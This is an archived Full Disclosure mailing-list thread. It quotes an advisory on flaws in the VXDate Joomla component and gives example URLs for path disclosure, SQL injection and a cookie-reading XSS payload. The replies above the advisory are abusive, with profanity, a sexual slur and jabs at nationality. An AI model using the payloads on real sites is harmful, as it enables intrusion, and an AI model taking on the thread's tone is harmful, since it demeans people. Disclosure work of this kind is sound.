Full Disclosure mailing list archives

Re: Vulnerabilities in VXDate for Joomla

From: "Anders Klixbull" <akl () experian dk>
Date: Mon, 22 Mar 2010 13:36:18 +0100

lol look who's talking about being professional
yeah sure because klixbull is such a russian name right?
and oh yeah my email address also ends in .ua
julian its time to stop gobbling that cock and shut the fuck up
 
 

________________________________

From: full-disclosure-bounces () lists grok org uk
[mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of julian
steward
Sent: 22. marts 2010 13:34
To: full-disclosure () lists grok org uk >> fdisclo
Subject: Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla


Sucking lemon hurts, I don't see why I would suck one Mr Klixbull
 
Regarding his disclosure, then he shall stfu about the timeline if he
wanna be "professional".

Yup Klixbull it's time to close your basement door and your mounth, or
are you too from .ua btw ?
 

         


         
        On Mon, Mar 22, 2010 at 7:41 AM, Anders Klixbull
<akl () experian dk> wrote:
        

                bohooo stop crying
                he can disclose bugs when he feels like it
                if you dont like that then go suck a lemon
                 
                
                 

________________________________

                From: full-disclosure-bounces () lists grok org uk
[mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of julian
steward
                Sent: 22. marts 2010 00:16
                To: MustLive; full-disclosure () lists grok org uk
                Subject: Re: [Full-disclosure] Vulnerabilities in VXDate
for Joomla
                
                
                7 month to inform the dev's, what kind of asshole are
you ?
                
                Oh wait, were you hacking some n00bs website, with your
shitty dork ?
                
                
                2010/3/17 MustLive <mustlive () websecurity com ua>
                

                        Hello Full-Disclosure!
                        
                        I want to warn you about vulnerabilities in
component VXDate for Joomla.
                        
                        -----------------------------
                        Advisory: Vulnerabilities in VXDate for Joomla
                        -----------------------------
                        URL: http://websecurity.com.ua/3849/
                        -----------------------------
                        Timeline:
                        
                        10.05.2009 - found the vulnerabilities.
                        12.01.2010 - announced at my site.
                        18.01.2010 - informed developers.
                        13.03.2010 - disclosed at my site.
                        -----------------------------
                        Details:
                        
                        These are Full path disclosure, SQL Injection
and Cross-Site Scripting
                        vulnerabilities.
                        
                        Full path disclosure:
                        
                        http://site/index.php?option=com_vxdate&ct=&apos;
                        
        
http://site/index.php?option=com_vxdate&ct=1&md=details&id=&apos;
                        
        
http://site/index.php?option=com_vxdate&ct=1&md=editform&id=&apos;
                        
                        SQL Injection:
                        
        
http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20ver
sion()=5
                        
        
http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20ve
rsion()=5
                        
                        XSS:
                        
        
http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ea
lert(document.cookie)%3C/script%3E
                        
        
http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3E
alert(document.cookie)%3C/script%3E
                        
                        Vulnerable are potentially all versions of
VXDate.
                        
                        Best wishes & regards,
                        MustLive
                        Administrator of Websecurity web site
                        http://websecurity.com.ua
<http://websecurity.com.ua/> 
                        
                        _______________________________________________
                        Full-Disclosure - We believe in it.
                        Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
                        Hosted and sponsored by Secunia -
http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Vulnerabilities in VXDate for Joomla MustLive (Mar 18)
- Re: Vulnerabilities in VXDate for Joomla julian steward (Mar 21)
  - Re: Vulnerabilities in VXDate for Joomla Anders Klixbull (Mar 22)
    - Message not available
    - Re: Vulnerabilities in VXDate for Joomla julian steward (Mar 22)
    - Re: Vulnerabilities in VXDate for Joomla Anders Klixbull (Mar 22)
    - Re: Vulnerabilities in VXDate for Joomla julian steward (Mar 22)
    - Re: Vulnerabilities in VXDate for Joomla Anders Klixbull (Mar 22)
    - Re: Vulnerabilities in VXDate for Joomla julian steward (Mar 22)
    - Re: Vulnerabilities in VXDate for Joomla Anders Klixbull (Mar 22)
    - Re: Vulnerabilities in VXDate for Joomla julian steward (Mar 22)
    - Re: Vulnerabilities in VXDate for Joomla Anders Klixbull (Mar 22)